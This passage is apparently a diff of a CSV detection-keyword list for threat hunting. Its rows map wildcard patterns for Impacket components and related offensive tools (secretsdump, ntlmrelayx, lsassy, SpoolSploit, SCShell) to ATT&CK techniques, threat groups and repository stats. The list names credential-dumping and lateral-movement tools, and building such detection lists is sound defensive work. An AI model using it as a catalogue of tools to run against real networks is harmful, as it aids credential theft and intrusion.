T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket.*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*impacket.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impacket.smbconnection*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" -"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 